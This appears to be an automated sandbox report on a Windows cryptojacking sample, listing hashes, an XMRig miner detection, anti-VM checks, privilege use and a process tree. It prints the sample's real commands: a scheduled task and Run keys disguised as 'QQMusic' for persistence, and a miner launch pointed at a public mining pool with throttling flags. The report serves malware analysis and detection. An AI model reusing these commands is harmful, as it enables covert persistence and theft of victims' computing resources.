Analysis
-
max time kernel
150s -
max time network
148s -
platform
windows10-2004_x64 -
resource
win10v2004-20240611-en -
resource tags
arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system -
submitted
14-06-2024 09:42
Static task
static1
Behavioral task
behavioral1
Sample
a2af48a018c65d34b445bd35bdd1b597.exe
Resource
win7-20240611-en
Behavioral task
behavioral2
Sample
a2af48a018c65d34b445bd35bdd1b597.exe
Resource
win10v2004-20240611-en
General
-
Target
a2af48a018c65d34b445bd35bdd1b597.exe
-
Size
9.0MB
-
MD5
a2af48a018c65d34b445bd35bdd1b597
-
SHA1
76daedc184a0cb9a717fc49f86a57b5baed0a35c
-
SHA256
d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60
-
SHA512
d8def07a8accdb65b6b9dfc3168981b600a78310ec06cb626fcd000e7bcc4627ff5be7fc9f26992838226d84982ddd470d9ac89e041727e72b738a61bec61319
-
SSDEEP
196608:rhHMBGC3PtXtT+Was8ywq1wo9JoYx5JAMdJOnZTG1IvQSaKe6NZOn:r2G0jwuwasMdJOnZKVSaaNZOn
Malware Config
Signatures
-
XMRig Miner payload 15 IoCs
resource yara_rule behavioral2/memory/3440-132-0x00007FF6F4910000-0x00007FF6F4F54000-memory.dmp xmrig behavioral2/memory/3440-138-0x00007FF6F4910000-0x00007FF6F4F54000-memory.dmp xmrig behavioral2/memory/440-141-0x00007FF6F4910000-0x00007FF6F4F54000-memory.dmp xmrig behavioral2/memory/3312-148-0x00007FF6F4910000-0x00007FF6F4F54000-memory.dmp xmrig behavioral2/memory/5480-152-0x00007FF6F4910000-0x00007FF6F4F54000-memory.dmp xmrig behavioral2/memory/5724-156-0x00007FF6F4910000-0x00007FF6F4F54000-memory.dmp xmrig behavioral2/memory/6392-160-0x00007FF6F4910000-0x00007FF6F4F54000-memory.dmp xmrig behavioral2/memory/6532-164-0x00007FF6F4910000-0x00007FF6F4F54000-memory.dmp xmrig behavioral2/memory/6764-168-0x00007FF6F4910000-0x00007FF6F4F54000-memory.dmp xmrig behavioral2/memory/6880-179-0x00007FF6F4910000-0x00007FF6F4F54000-memory.dmp xmrig behavioral2/memory/6356-182-0x00007FF6F4910000-0x00007FF6F4F54000-memory.dmp xmrig behavioral2/memory/6608-186-0x00007FF6F4910000-0x00007FF6F4F54000-memory.dmp xmrig behavioral2/memory/6748-190-0x00007FF6F4910000-0x00007FF6F4F54000-memory.dmp xmrig behavioral2/memory/5824-194-0x00007FF6F4910000-0x00007FF6F4F54000-memory.dmp xmrig behavioral2/memory/6932-198-0x00007FF6F4910000-0x00007FF6F4F54000-memory.dmp xmrig -
Executes dropped EXE 17 IoCs
pid Process 3440 2HIf.exe 4840 SMB.exe 440 2HIf.exe 3312 2HIf.exe 5480 2HIf.exe 5724 2HIf.exe 6392 2HIf.exe 6532 2HIf.exe 6764 2HIf.exe 6880 2HIf.exe 2932 a2af48a018c65d34b445bd35bdd1b597.exe 6356 2HIf.exe 6608 2HIf.exe 6748 2HIf.exe 5824 2HIf.exe 6932 2HIf.exe 6616 2HIf.exe -
resource yara_rule behavioral2/files/0x00080000000235b4-7.dat upx behavioral2/memory/3440-8-0x00007FF6F4910000-0x00007FF6F4F54000-memory.dmp upx behavioral2/memory/3440-132-0x00007FF6F4910000-0x00007FF6F4F54000-memory.dmp upx behavioral2/memory/3440-138-0x00007FF6F4910000-0x00007FF6F4F54000-memory.dmp upx behavioral2/memory/440-141-0x00007FF6F4910000-0x00007FF6F4F54000-memory.dmp upx behavioral2/memory/3312-148-0x00007FF6F4910000-0x00007FF6F4F54000-memory.dmp upx behavioral2/memory/5480-152-0x00007FF6F4910000-0x00007FF6F4F54000-memory.dmp upx behavioral2/memory/5724-156-0x00007FF6F4910000-0x00007FF6F4F54000-memory.dmp upx behavioral2/memory/6392-160-0x00007FF6F4910000-0x00007FF6F4F54000-memory.dmp upx behavioral2/memory/6532-164-0x00007FF6F4910000-0x00007FF6F4F54000-memory.dmp upx behavioral2/memory/6764-168-0x00007FF6F4910000-0x00007FF6F4F54000-memory.dmp upx behavioral2/memory/6880-179-0x00007FF6F4910000-0x00007FF6F4F54000-memory.dmp upx behavioral2/memory/6356-182-0x00007FF6F4910000-0x00007FF6F4F54000-memory.dmp upx behavioral2/memory/6608-186-0x00007FF6F4910000-0x00007FF6F4F54000-memory.dmp upx behavioral2/memory/6748-190-0x00007FF6F4910000-0x00007FF6F4F54000-memory.dmp upx behavioral2/memory/5824-194-0x00007FF6F4910000-0x00007FF6F4F54000-memory.dmp upx behavioral2/memory/6932-198-0x00007FF6F4910000-0x00007FF6F4F54000-memory.dmp upx -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\QQMusic = "C:\\Users\\Admin\\AppData\\Local\\Temp\\a2af48a018c65d34b445bd35bdd1b597.exe" a2af48a018c65d34b445bd35bdd1b597.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\QQMusic = "C:\\Users\\Admin\\AppData\\Local\\Temp\\a2af48a018c65d34b445bd35bdd1b597.exe" a2af48a018c65d34b445bd35bdd1b597.exe -
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\K: a2af48a018c65d34b445bd35bdd1b597.exe -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description ioc Process File opened (read-only) \??\VBoxMiniRdrDN a2af48a018c65d34b445bd35bdd1b597.exe File opened (read-only) \??\VBoxMiniRdrDN a2af48a018c65d34b445bd35bdd1b597.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz a2af48a018c65d34b445bd35bdd1b597.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 a2af48a018c65d34b445bd35bdd1b597.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5048 schtasks.exe -
Gathers network information 2 TTPs 4 IoCs
Uses commandline utility to view network configuration.
pid Process 2268 ipconfig.exe 2376 ipconfig.exe 4620 ipconfig.exe 5776 ipconfig.exe -
Kills process with taskkill 8 IoCs
pid Process 6820 taskkill.exe 6584 taskkill.exe 2512 taskkill.exe 6508 taskkill.exe 1256 taskkill.exe 972 taskkill.exe 5548 taskkill.exe 6448 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3484 a2af48a018c65d34b445bd35bdd1b597.exe 3484 a2af48a018c65d34b445bd35bdd1b597.exe 3484 a2af48a018c65d34b445bd35bdd1b597.exe 3484 a2af48a018c65d34b445bd35bdd1b597.exe 3484 a2af48a018c65d34b445bd35bdd1b597.exe 3484 a2af48a018c65d34b445bd35bdd1b597.exe 3484 a2af48a018c65d34b445bd35bdd1b597.exe 3484 a2af48a018c65d34b445bd35bdd1b597.exe 3484 a2af48a018c65d34b445bd35bdd1b597.exe 3484 a2af48a018c65d34b445bd35bdd1b597.exe 3484 a2af48a018c65d34b445bd35bdd1b597.exe 3484 a2af48a018c65d34b445bd35bdd1b597.exe 3484 a2af48a018c65d34b445bd35bdd1b597.exe 3484 a2af48a018c65d34b445bd35bdd1b597.exe 3484 a2af48a018c65d34b445bd35bdd1b597.exe 3484 a2af48a018c65d34b445bd35bdd1b597.exe 3484 a2af48a018c65d34b445bd35bdd1b597.exe 3484 a2af48a018c65d34b445bd35bdd1b597.exe 3484 a2af48a018c65d34b445bd35bdd1b597.exe 3484 a2af48a018c65d34b445bd35bdd1b597.exe 3484 a2af48a018c65d34b445bd35bdd1b597.exe 3484 a2af48a018c65d34b445bd35bdd1b597.exe 3484 a2af48a018c65d34b445bd35bdd1b597.exe 3484 a2af48a018c65d34b445bd35bdd1b597.exe 3484 a2af48a018c65d34b445bd35bdd1b597.exe 3484 a2af48a018c65d34b445bd35bdd1b597.exe 3484 a2af48a018c65d34b445bd35bdd1b597.exe 3484 a2af48a018c65d34b445bd35bdd1b597.exe 3484 a2af48a018c65d34b445bd35bdd1b597.exe 3484 a2af48a018c65d34b445bd35bdd1b597.exe 3484 a2af48a018c65d34b445bd35bdd1b597.exe 3484 a2af48a018c65d34b445bd35bdd1b597.exe 3484 a2af48a018c65d34b445bd35bdd1b597.exe 3484 a2af48a018c65d34b445bd35bdd1b597.exe 3484 a2af48a018c65d34b445bd35bdd1b597.exe 3484 a2af48a018c65d34b445bd35bdd1b597.exe 3484 a2af48a018c65d34b445bd35bdd1b597.exe 3484 a2af48a018c65d34b445bd35bdd1b597.exe 3484 a2af48a018c65d34b445bd35bdd1b597.exe 3484 a2af48a018c65d34b445bd35bdd1b597.exe 3484 a2af48a018c65d34b445bd35bdd1b597.exe 3484 a2af48a018c65d34b445bd35bdd1b597.exe 3484 a2af48a018c65d34b445bd35bdd1b597.exe 3484 a2af48a018c65d34b445bd35bdd1b597.exe 3484 a2af48a018c65d34b445bd35bdd1b597.exe 3484 a2af48a018c65d34b445bd35bdd1b597.exe 3484 a2af48a018c65d34b445bd35bdd1b597.exe 3484 a2af48a018c65d34b445bd35bdd1b597.exe 3484 a2af48a018c65d34b445bd35bdd1b597.exe 3484 a2af48a018c65d34b445bd35bdd1b597.exe 3484 a2af48a018c65d34b445bd35bdd1b597.exe 3484 a2af48a018c65d34b445bd35bdd1b597.exe 3484 a2af48a018c65d34b445bd35bdd1b597.exe 3484 a2af48a018c65d34b445bd35bdd1b597.exe 3484 a2af48a018c65d34b445bd35bdd1b597.exe 3484 a2af48a018c65d34b445bd35bdd1b597.exe 3484 a2af48a018c65d34b445bd35bdd1b597.exe 3484 a2af48a018c65d34b445bd35bdd1b597.exe 3484 a2af48a018c65d34b445bd35bdd1b597.exe 3484 a2af48a018c65d34b445bd35bdd1b597.exe 3484 a2af48a018c65d34b445bd35bdd1b597.exe 3484 a2af48a018c65d34b445bd35bdd1b597.exe 3484 a2af48a018c65d34b445bd35bdd1b597.exe 3484 a2af48a018c65d34b445bd35bdd1b597.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3484 a2af48a018c65d34b445bd35bdd1b597.exe -
Suspicious use of AdjustPrivilegeToken 46 IoCs
description pid Process Token: SeDebugPrivilege 3484 a2af48a018c65d34b445bd35bdd1b597.exe Token: SeBackupPrivilege 3484 a2af48a018c65d34b445bd35bdd1b597.exe Token: SeSecurityPrivilege 3484 a2af48a018c65d34b445bd35bdd1b597.exe Token: SeSecurityPrivilege 3484 a2af48a018c65d34b445bd35bdd1b597.exe Token: SeBackupPrivilege 3484 a2af48a018c65d34b445bd35bdd1b597.exe Token: SeSecurityPrivilege 3484 a2af48a018c65d34b445bd35bdd1b597.exe Token: SeBackupPrivilege 3484 a2af48a018c65d34b445bd35bdd1b597.exe Token: SeSecurityPrivilege 3484 a2af48a018c65d34b445bd35bdd1b597.exe Token: SeBackupPrivilege 3484 a2af48a018c65d34b445bd35bdd1b597.exe Token: SeSecurityPrivilege 3484 a2af48a018c65d34b445bd35bdd1b597.exe Token: SeDebugPrivilege 1256 taskkill.exe Token: SeLockMemoryPrivilege 3440 2HIf.exe Token: SeLockMemoryPrivilege 3440 2HIf.exe Token: SeDebugPrivilege 972 taskkill.exe Token: SeLockMemoryPrivilege 440 2HIf.exe Token: SeLockMemoryPrivilege 440 2HIf.exe Token: SeLockMemoryPrivilege 3312 2HIf.exe Token: SeLockMemoryPrivilege 3312 2HIf.exe Token: SeDebugPrivilege 5548 taskkill.exe Token: SeLockMemoryPrivilege 5480 2HIf.exe Token: SeLockMemoryPrivilege 5480 2HIf.exe Token: SeLockMemoryPrivilege 5724 2HIf.exe Token: SeLockMemoryPrivilege 5724 2HIf.exe Token: SeDebugPrivilege 6448 taskkill.exe Token: SeLockMemoryPrivilege 6392 2HIf.exe Token: SeLockMemoryPrivilege 6392 2HIf.exe Token: SeLockMemoryPrivilege 6532 2HIf.exe Token: SeLockMemoryPrivilege 6532 2HIf.exe Token: SeDebugPrivilege 6820 taskkill.exe Token: SeLockMemoryPrivilege 6880 2HIf.exe Token: SeLockMemoryPrivilege 6880 2HIf.exe Token: SeDebugPrivilege 6584 taskkill.exe Token: SeLockMemoryPrivilege 6356 2HIf.exe Token: SeLockMemoryPrivilege 6356 2HIf.exe Token: SeLockMemoryPrivilege 6608 2HIf.exe Token: SeLockMemoryPrivilege 6608 2HIf.exe Token: SeDebugPrivilege 2512 taskkill.exe Token: SeLockMemoryPrivilege 6748 2HIf.exe Token: SeLockMemoryPrivilege 6748 2HIf.exe Token: SeLockMemoryPrivilege 5824 2HIf.exe Token: SeLockMemoryPrivilege 5824 2HIf.exe Token: SeDebugPrivilege 6508 taskkill.exe Token: SeLockMemoryPrivilege 6932 2HIf.exe Token: SeLockMemoryPrivilege 6932 2HIf.exe Token: SeLockMemoryPrivilege 6616 2HIf.exe Token: SeLockMemoryPrivilege 6616 2HIf.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3484 wrote to memory of 3184 3484 a2af48a018c65d34b445bd35bdd1b597.exe 97 PID 3484 wrote to memory of 3184 3484 a2af48a018c65d34b445bd35bdd1b597.exe 97 PID 3484 wrote to memory of 3184 3484 a2af48a018c65d34b445bd35bdd1b597.exe 97 PID 3484 wrote to memory of 5072 3484 a2af48a018c65d34b445bd35bdd1b597.exe 99 PID 3484 wrote to memory of 5072 3484 a2af48a018c65d34b445bd35bdd1b597.exe 99 PID 3484 wrote to memory of 5072 3484 a2af48a018c65d34b445bd35bdd1b597.exe 99 PID 3184 wrote to memory of 5048 3184 cmd.exe 101 PID 3184 wrote to memory of 5048 3184 cmd.exe 101 PID 3184 wrote to memory of 5048 3184 cmd.exe 101 PID 5072 wrote to memory of 1256 5072 cmd.exe 102 PID 5072 wrote to memory of 1256 5072 cmd.exe 102 PID 5072 wrote to memory of 1256 5072 cmd.exe 102 PID 3484 wrote to memory of 2380 3484 a2af48a018c65d34b445bd35bdd1b597.exe 103 PID 3484 wrote to memory of 2380 3484 a2af48a018c65d34b445bd35bdd1b597.exe 103 PID 3484 wrote to memory of 2380 3484 a2af48a018c65d34b445bd35bdd1b597.exe 103 PID 2380 wrote to memory of 2376 2380 cmd.exe 105 PID 2380 wrote to memory of 2376 2380 cmd.exe 105 PID 2380 wrote to memory of 2376 2380 cmd.exe 105 PID 3484 wrote to memory of 3440 3484 a2af48a018c65d34b445bd35bdd1b597.exe 106 PID 3484 wrote to memory of 3440 3484 a2af48a018c65d34b445bd35bdd1b597.exe 106 PID 3484 wrote to memory of 4840 3484 a2af48a018c65d34b445bd35bdd1b597.exe 108 PID 3484 wrote to memory of 4840 3484 a2af48a018c65d34b445bd35bdd1b597.exe 108 PID 3484 wrote to memory of 4840 3484 a2af48a018c65d34b445bd35bdd1b597.exe 108 PID 3484 wrote to memory of 744 3484 a2af48a018c65d34b445bd35bdd1b597.exe 109 PID 3484 wrote to memory of 744 3484 a2af48a018c65d34b445bd35bdd1b597.exe 109 PID 3484 wrote to memory of 744 3484 a2af48a018c65d34b445bd35bdd1b597.exe 109 PID 3484 wrote to memory of 440 3484 a2af48a018c65d34b445bd35bdd1b597.exe 111 PID 3484 wrote to memory of 440 3484 a2af48a018c65d34b445bd35bdd1b597.exe 111 PID 744 wrote to memory of 972 744 cmd.exe 113 PID 744 wrote to memory of 972 744 cmd.exe 113 PID 744 wrote to memory of 972 744 cmd.exe 113 PID 3484 wrote to memory of 3312 3484 a2af48a018c65d34b445bd35bdd1b597.exe 114 PID 3484 wrote to memory of 3312 3484 a2af48a018c65d34b445bd35bdd1b597.exe 114 PID 3484 wrote to memory of 2240 3484 a2af48a018c65d34b445bd35bdd1b597.exe 116 PID 3484 wrote to memory of 2240 3484 a2af48a018c65d34b445bd35bdd1b597.exe 116 PID 3484 wrote to memory of 2240 3484 a2af48a018c65d34b445bd35bdd1b597.exe 116 PID 2240 wrote to memory of 4620 2240 cmd.exe 118 PID 2240 wrote to memory of 4620 2240 cmd.exe 118 PID 2240 wrote to memory of 4620 2240 cmd.exe 118 PID 3484 wrote to memory of 5428 3484 a2af48a018c65d34b445bd35bdd1b597.exe 119 PID 3484 wrote to memory of 5428 3484 a2af48a018c65d34b445bd35bdd1b597.exe 119 PID 3484 wrote to memory of 5428 3484 a2af48a018c65d34b445bd35bdd1b597.exe 119 PID 3484 wrote to memory of 5480 3484 a2af48a018c65d34b445bd35bdd1b597.exe 121 PID 3484 wrote to memory of 5480 3484 a2af48a018c65d34b445bd35bdd1b597.exe 121 PID 5428 wrote to memory of 5548 5428 cmd.exe 123 PID 5428 wrote to memory of 5548 5428 cmd.exe 123 PID 5428 wrote to memory of 5548 5428 cmd.exe 123 PID 3484 wrote to memory of 5724 3484 a2af48a018c65d34b445bd35bdd1b597.exe 124 PID 3484 wrote to memory of 5724 3484 a2af48a018c65d34b445bd35bdd1b597.exe 124 PID 3484 wrote to memory of 6352 3484 a2af48a018c65d34b445bd35bdd1b597.exe 128 PID 3484 wrote to memory of 6352 3484 a2af48a018c65d34b445bd35bdd1b597.exe 128 PID 3484 wrote to memory of 6352 3484 a2af48a018c65d34b445bd35bdd1b597.exe 128 PID 3484 wrote to memory of 6392 3484 a2af48a018c65d34b445bd35bdd1b597.exe 130 PID 3484 wrote to memory of 6392 3484 a2af48a018c65d34b445bd35bdd1b597.exe 130 PID 6352 wrote to memory of 6448 6352 cmd.exe 132 PID 6352 wrote to memory of 6448 6352 cmd.exe 132 PID 6352 wrote to memory of 6448 6352 cmd.exe 132 PID 3484 wrote to memory of 6532 3484 a2af48a018c65d34b445bd35bdd1b597.exe 133 PID 3484 wrote to memory of 6532 3484 a2af48a018c65d34b445bd35bdd1b597.exe 133 PID 3484 wrote to memory of 6724 3484 a2af48a018c65d34b445bd35bdd1b597.exe 135 PID 3484 wrote to memory of 6724 3484 a2af48a018c65d34b445bd35bdd1b597.exe 135 PID 3484 wrote to memory of 6724 3484 a2af48a018c65d34b445bd35bdd1b597.exe 135 PID 3484 wrote to memory of 6764 3484 a2af48a018c65d34b445bd35bdd1b597.exe 137 PID 3484 wrote to memory of 6764 3484 a2af48a018c65d34b445bd35bdd1b597.exe 137
Processes
-
C:\Users\Admin\AppData\Local\Temp\a2af48a018c65d34b445bd35bdd1b597.exe"C:\Users\Admin\AppData\Local\Temp\a2af48a018c65d34b445bd35bdd1b597.exe"1⤵
- Adds Run key to start application
- Enumerates connected drives
- Checks for VirtualBox DLLs, possible anti-VM trick
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3484 -
C:\Windows\SysWOW64\cmd.execmd /c schtasks /create /sc minute /mo 1 /tn "QQMusic" /tr C:\Users\Admin\AppData\Local\Temp\a2af48a018c65d34b445bd35bdd1b597.exe /F2⤵
- Suspicious use of WriteProcessMemory
PID:3184 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "QQMusic" /tr C:\Users\Admin\AppData\Local\Temp\a2af48a018c65d34b445bd35bdd1b597.exe /F3⤵
- Creates scheduled task(s)
PID:5048
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im 2HIf.exe&&exit2⤵
- Suspicious use of WriteProcessMemory
PID:5072 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im 2HIf.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1256
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ipconfig /flushdns2⤵
- Suspicious use of WriteProcessMemory
PID:2380 -
C:\Windows\SysWOW64\ipconfig.exeipconfig /flushdns3⤵
- Gathers network information
PID:2376
-
-
-
C:\ProgramData\2HIf.exeC:\ProgramData\2HIf.exe -o stratum+tcp://auto.c3pool.org:19999 -u L -p 1 --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3440
-
-
C:\ProgramData\SMB.exeC:\ProgramData\SMB.exe2⤵
- Executes dropped EXE
PID:4840
-
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im 2HIf.exe&&exit2⤵
- Suspicious use of WriteProcessMemory
PID:744 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im 2HIf.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:972
-
-
-
C:\ProgramData\2HIf.exeC:\ProgramData\2HIf.exe -o stratum+tcp://auto.c3pool.org:19999 -u L -p 1 --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:440
-
-
C:\ProgramData\2HIf.exeC:\ProgramData\2HIf.exe -o stratum+tcp://auto.c3pool.org:19999 -u L -p 1 --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3312
-
-
C:\Windows\SysWOW64\cmd.execmd /c ipconfig /flushdns2⤵
- Suspicious use of WriteProcessMemory
PID:2240 -
C:\Windows\SysWOW64\ipconfig.exeipconfig /flushdns3⤵
- Gathers network information
PID:4620
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im 2HIf.exe&&exit2⤵
- Suspicious use of WriteProcessMemory
PID:5428 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im 2HIf.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5548
-
-
-
C:\ProgramData\2HIf.exeC:\ProgramData\2HIf.exe -o stratum+tcp://auto.c3pool.org:19999 -u L -p 1 --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5480
-
-
C:\ProgramData\2HIf.exeC:\ProgramData\2HIf.exe -o stratum+tcp://auto.c3pool.org:19999 -u L -p 1 --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5724
-
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im 2HIf.exe&&exit2⤵
- Suspicious use of WriteProcessMemory
PID:6352 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im 2HIf.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:6448
-
-
-
C:\ProgramData\2HIf.exeC:\ProgramData\2HIf.exe -o stratum+tcp://auto.c3pool.org:19999 -u L -p 1 --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:6392
-
-
C:\ProgramData\2HIf.exeC:\ProgramData\2HIf.exe -o stratum+tcp://auto.c3pool.org:19999 -u L -p 1 --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:6532
-
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im 2HIf.exe&&exit2⤵PID:6724
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im 2HIf.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:6820
-
-
-
C:\ProgramData\2HIf.exeC:\ProgramData\2HIf.exe -o stratum+tcp://auto.c3pool.org:19999 -u L -p 1 --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K2⤵
- Executes dropped EXE
PID:6764
-
-
C:\ProgramData\2HIf.exeC:\ProgramData\2HIf.exe -o stratum+tcp://auto.c3pool.org:19999 -u L -p 1 --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:6880
-
-
C:\Windows\SysWOW64\cmd.execmd /c ipconfig /flushdns2⤵PID:5824
-
C:\Windows\SysWOW64\ipconfig.exeipconfig /flushdns3⤵
- Gathers network information
PID:5776
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im 2HIf.exe&&exit2⤵PID:6472
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im 2HIf.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:6584
-
-
-
C:\ProgramData\2HIf.exeC:\ProgramData\2HIf.exe -o stratum+tcp://auto.c3pool.org:19999 -u L -p 1 --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:6356
-
-
C:\ProgramData\2HIf.exeC:\ProgramData\2HIf.exe -o stratum+tcp://auto.c3pool.org:19999 -u L -p 1 --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:6608
-
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im 2HIf.exe&&exit2⤵PID:6788
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im 2HIf.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2512
-
-
-
C:\ProgramData\2HIf.exeC:\ProgramData\2HIf.exe -o stratum+tcp://auto.c3pool.org:19999 -u L -p 1 --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:6748
-
-
C:\ProgramData\2HIf.exeC:\ProgramData\2HIf.exe -o stratum+tcp://auto.c3pool.org:19999 -u L -p 1 --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5824
-
-
C:\Windows\SysWOW64\cmd.execmd /c ipconfig /flushdns2⤵PID:1780
-
C:\Windows\SysWOW64\ipconfig.exeipconfig /flushdns3⤵
- Gathers network information
PID:2268
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im 2HIf.exe&&exit2⤵PID:6436
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im 2HIf.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:6508
-
-
-
C:\ProgramData\2HIf.exeC:\ProgramData\2HIf.exe -o stratum+tcp://auto.c3pool.org:19999 -u L -p 1 --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:6932
-
-
C:\ProgramData\2HIf.exeC:\ProgramData\2HIf.exe -o stratum+tcp://auto.c3pool.org:19999 -u L -p 1 --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:6616
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4512,i,1400471177590024469,587385956640537806,262144 --variations-seed-version --mojo-platform-channel-handle=4112 /prefetch:81⤵PID:3312
-
C:\Users\Admin\AppData\Local\Temp\a2af48a018c65d34b445bd35bdd1b597.exeC:\Users\Admin\AppData\Local\Temp\a2af48a018c65d34b445bd35bdd1b597.exe1⤵
- Executes dropped EXE
- Checks for VirtualBox DLLs, possible anti-VM trick
PID:2932
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.3MB
MD523d84a7ed2e8e76d0a13197b74913654
SHA123d04ba674bafbad225243dc81ce7eccd744a35a
SHA256ac530d542a755ecce6a656ea6309717ec222c34d7e34c61792f3b350a8a29301
SHA512aa6b0100d477214d550b6498787190fc1a8fafa7c478f9595d45e4e76ece9888b84dcca26696500d5710a9d1acae4810f2606d8962c46d31f2bdfcdd27bd675c
-
Filesize
3.1MB
MD57b2f170698522cd844e0423252ad36c1
SHA1303ac0aaf0e9f48d4943e57d1ee6c757f2dd48c5
SHA2565214f356f2e8640230e93a95633cd73945c38027b23e76bb5e617c71949f8994
SHA5127155477e6988a16f6d12a0800ab72b9b9b64b97a509324ac0669cec2a4b82cd81b3481ae2c2d1ce65e73b017cebb56628d949d6195aac8f6ddd9625a80789dfa
-
Filesize
85KB
MD506e587c2a788a7b34677cfa84f28205c
SHA1f7d9397173a7df3e920170a36f082492527f4c58
SHA2566171a8d94a095a76b8c3ba8a4112f1af81bac888abbfe691c55f00910c114a3b
SHA512c8d0d6cb983f41beeac53989d81e9c8319d37445e5fe283def0b75b7a0c96b0aaaad080fa56774514ce6a46fa07741bb8c0115baebb7946a7ead236423fcface
-
Filesize
71KB
MD5f7bf3111cd1153bde61f76eda55658bf
SHA173a74a3f180a8ae7dfd96d38278453474ca28d29
SHA2560e18ae38a12b9da25bf3501bb37870315fae938d397a1b4ab5797e275a528889
